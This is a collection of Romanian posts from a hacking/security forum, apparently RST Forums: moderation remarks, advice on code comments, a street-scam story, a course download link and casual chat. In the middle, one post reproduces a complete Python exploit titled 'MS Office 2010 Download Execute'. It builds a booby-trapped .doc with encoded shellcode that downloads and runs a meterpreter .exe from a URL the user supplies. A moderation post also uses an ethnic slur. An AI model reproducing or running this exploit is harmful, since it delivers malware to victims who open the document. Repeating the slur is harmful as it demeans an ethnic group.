M2G

Rezolvat.

Statistica forum. Votati.

Avem chat, e suficient. Deci nu. Daca vrei sa te faci util mai bine faci un tutorial, sau ne prezinti ceva ce ai descoperit tu si ti se pare interesant si cu relevanta in IT/securitate.

Mie mi se pare mai curat noul design. Din cate am inteles, vor sa faca interfata sa fie la fel pentru toate dispozitivele de pe care te loghezi(telefon, pc, tableta). Ca sa ai o consistenta asupra layout-ului.

Security level: Hackyard Concurs in care utilizatorii isi pun adresa de mail asociata cu un nick pe o pagina publica prin comentarii. GG

In productie, un cod necomentat este un cod slab si nici nu o sa treaca de validari. Poate ca acum lucrati pe proiectul X dar poate peste cateva luni/ani firma se decide ca vrea sa aduca modificari softului scris de voi. Daca acel cod nu e documentat se va pierde o cantitate enorma de timp pentru ca dezvoltatorii sa isi dea seama ce ati facut voi acolo. Nici macar voi care l-ati scris nu o sa mai stiti ce ati facut acolo. La proiecte mici (personale) si proiecte de scoala poate nu sunt asa necesare comentariile dar intr-un cod de productie este absolut obligatoriu sa ai comentarii. In mod normal codul trebuie sa fie asa de bine scris incat sa se citeasca ca si o poveste dar nu toata lumea are inspiratia de a da nume variabilelor si claselor cat mai clare. Asa ca la nivel de companie se introduce nevoia aceasta de a scrie documentatii si comentarii pentru a se putea face o mentenanta asupra codului.

Eu chiar am avut ocazia sa folosesc chestii de genul acesta. Aveam de scris niste teste pentru un cod. Acel cod este compilat cu un compilator proprietar pentru ca trebuie sa fie SIL4. Acel compilator folosea functii proprii cum ar fi "hugealloc" si multe altele. Pentru a testa codul am folosit google test framework si Cxx test intr-un proiect visual studio cu compilatorul celor de la microsoft. Pentru a rezolva dependentele de acele functii scriam intr-un fisier header chestii de genu: #define hugealloc malloc

Warn pentru oricine se mai baga peste postul cuiva la market. Warn pentru orice fel de offtopic la market. Respectati regulamentul acela ca nu e pus degeaba acolo. Exemplu de "asa nu": https://rstforums.com/forum/66001-ofer-traduceri-romana-engleza-engleza-romana.rst Sunteti mai rai ca si tiganii. Daca cineva vinde ceva, veniti voi repede sa stricati postul omului. Daca aveti ceva similar de oferit, faceti thread separat.

Si in Cluj am intalnit pe cineva care folosea "tehnica" asta. Doar ca acela era barbat si povestea lui era ca este tirist, are marfa in tir de nu stiu cate sute de milione si i s-a stricat tiru. Mai baga ceva detalii unde era parcat si ca nu gaseste unde sa parcheze in oras si iti cerea bani sa isi cumpere de mancare ca e plecat in oras de dimineata sa gaseasca mecanic sau ceva loc de parcare unde sa lase tiru pana vine mecanicul de la firma lui. Nu mai stiu exact poveste pentru ca s-a intamplat cam de un an dar in principiu e cam aceasi chestie ca si "tehnica".

Gruparea infractionara RST my ass. Black si alexeu au 0-day in aparatele de la pacanele.

Acum ma imbrac si pornesc. :>

Bine ai venit! M-am uitat si peste posturile tale si mi-a placut ce am vazut. Cu atat mai mult cu cat acestea vin de la o persoana de 15 ani. Putini dintre cei care au varsta ta detin asemenea cunostinte. Sfat: Las-o mai moale cu jocurile de noroc pentru ca toate sunt calculate sa aduca profit celor care le manageriaza.

#!/usr/bin/python # Exploit Title: MS Office 2010 Download Execute # Google Dork: NA # Date: 19 Feb 2013 # Exploit Author: g11tch # Vendor Homepage: # Software Link: # Version: ALL # Tested on: [Windows XP SP1, SP2, Windows 7 ] # CVE : ########## #Just generate a meterpreter .exe, then provide the link to it via the exploit, it will automagically download and run said .exe import binascii import sys import time print "Microsoft Office 2010, download -N- execute " print " What do you want to name your .doc ? " print " Example: TotallyTrusted.doc " filename = raw_input() print " What is the link to your .exe ? " print "HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe " url = raw_input() print "Gears and Cranks working mag1c in the background " time.sleep(3) close="{}}}}}" binme=binascii.b2a_hex(url) file=('e1xydGYxbnNpbnNpY3BnMTI1MlxkZWZmMFxkZWZsYW5nMTAzM3sNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb250dGJsew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgMA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN3aXNzDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGFyc2V0MCBBcmlhbDt9fXtcKlxnZW5lcmF0b3IgTXNmdGVkaXQgNS40MS4xNS4xNTA3O30NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlld2tpbmQ0XHVjMVxwYXJkDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHMyMCBwYXJkXGYwXGZzXHBhci90YWJccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhclxwYXJ7XHNocHtcc3B9fXtcc2hwe1xzcH19e1xzaHB7XHNwfX17XHNocHtcKlxzaHBpbnN0XHNocGZoZHIwXHNocGJ4Y29sdW1uXHNocGJ5cGFyYVxzaCBwd3IyfXtcc3B7XHNue317fXtcc259e1xzbn17XCpcKn1wRnJhZ21lbnRzfXtcKlwqXCp9e1wqXCpcc3Z7XCp9OTsyO2ZmZmZmZmZmZmYjMDUwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwZTBiOTJjM2ZBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBNWMxMTEwM2ZhNTljMzgzZmNmYWYzOTNmMTAwMTA0MDEwMTAxMDEwMTAxMDEwMTAxZTBiOTJjM2YwMDgwMDAwMDQ2Y2IzOTNmZGVhZGJlZWZlMGI5MmMzZmMwM2QzYjNmY2MzMzIyM2ZkZjU5MmQzZmM0M2QzYjNmY2MxODJmM2ZjNDNkM2IzZjVlNzQyYjNmNWU3OTM5M2YyNDAwMDAwMDQ0Y2IzOTNmc2x1dGZ1Y2s2NzgyMzkzZmRlMTYzYTNmNjc4MjM5M2ZlMGI5MmMzZmMwM2QzYjNmYTU5YzM4M2Y3YzBhMmIzZmUwYjkyYzNmNTU2Njc3ODhjMDNkM2IzZmE1OWMzODNmZmJiZTM4M2ZlMGI5MmMzZjgwMDAwMDAwYjQ0MTM0M2Y1NTU1NTU1NTY2NjY2NjY2Y2ZhZjM5M2Y0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxZWI3NzMxYzk2NDhiNzEzMDhiNzYwYzhiNzYxYzhiNWUwODhiN2UyMDhiMzY2NjM5NGYxODc1ZjJjMzYwOGI2YzI0MjQ4YjQ1M2M4YjU0MDU3ODAxZWE4YjRhMTg4YjVhMjAwMWViZTMzNDQ5OGIzNDhiMDFlZTMxZmYzMWMwZmNhYzg0YzA3NDA3YzFjZjBkMDFjN2ViZjQzYjdjMjQyODc1ZTE4YjVhMjQwMWViNjY4YjBjNGI4YjVhMWMwMWViOGIwNDhiMDFlODg5NDQyNDFjNjFjM2U4OTJmZmZmZmY1ZjgxZWY5OGZmZmZmZmViMDVlOGVkZmZmZmZmNjg4ZTRlMGVlYzUzZTg5NGZmZmZmZjMxYzk2NmI5NmY2ZTUxNjg3NTcyNmM2ZDU0ZmZkMDY4MzYxYTJmNzA1MGU4N2FmZmZmZmYzMWM5NTE1MThkMzc4MWM2ZWVmZmZmZmY4ZDU2MGM1MjU3NTFmZmQwNjg5OGZlOGEwZTUzZTg1YmZmZmZmZjQxNTE1NmZmZDA2ODdlZDhlMjczNTNlODRiZmZmZmZmZmZkMDYzNmQ2NDJlNjU3ODY1MjAyZjYzMjAyMDYxMmU2NTc4NjUwMA==\n') textfile = open(filename , 'w') textfile.write(file.decode('base64')+binme+close) textfile.close() time.sleep(3) print "enjoy" Source

https://rstforums.com/forum/65518-confirmari-de-genuine-de-la-microsoft.rst Fumezi multe plante in ultima vreme? Si ce sugestie vezi tu acolo? Ala e post de ajutor, nu de sugestii. Postul a fost mutat, nu a fost sters.

Spor.

Jim Hague takes you through an informative and exciting course on e-marketing, including lessons featuring Facebook, Twitter, LinkedIn, Pinterest, and other popular forms of social media. At the rate that technology develops today, it is essential for businesses to utilize new and innovative ways to market themselves to potential customers. Jim utilizes his 15+ years experience building websites, developing media products, and teaching social media to help maximize marketing plans with simple explanations for first-timers and advanced tips for experienced users. Topics include everything from SEO, social media, and SMS/e-mail marketing to blogging. Continut: Download: RST - E-marketing - Ge.tt

Ai gresit forumul prietene. Ia o pauza.

Bai expertilor, sunteti ca batranii care comenteaza evenimentele politice cand se uita la TV. Ce se face, ce nu se face. Voi ce cacat faceti(in afara de a comenta degeba)? Cum voi sunteti buni in securitate stiti sa rulati pe un sandbox sau un VM, nu? Sunt cryptere luate de prin alte parti, si da, poate au backdoor. Poate nu.

Mai vrea cineva invitatie? Conditia e sa detina un numar rezonabil de posturi (de calitate).

Nu mai am cartile si nu mai am nici de unde sa le iau. Daca le are cineva, il rog sa le posteze. Erau intradevar disponibile pe acel server dar in urma evenimentelor recente in care a fost implicat RST si Tex, serverul este confiscat.

Nu stiu daca sa iti dau warn sau avertisment. Use the fucking fun stuff thread.

Cheat Sheets - Packet Life http://blog.securitymonks.com/2009/08/15/whats-in-your-folder-security-cheat-sheets/

Din pacate nu le mai am iar torentul a fost sters. Daca le mai are cineva il rog sa le posteze.

Nu stiu ce stil de lupta sa iti recomand pentru ca nu am practicat nici unul dar nu conteaza doar asta daca esti atacat. Mie mi se pare ca ceea ce conteaza este sa ai unpic de sange in tine in momentele alea. Cu alte cuvinte, conteaza atitudinea: Eu am facut sala acum cativa ani si vreau sa ma apuc iar de luna viitoare(asta te costa vreo 70-80 de lei pe luna). Daca vrei poti sa vii cu mine, mai pui pe tine ceva musculatura si sa vezi ca te vei simtii altfel.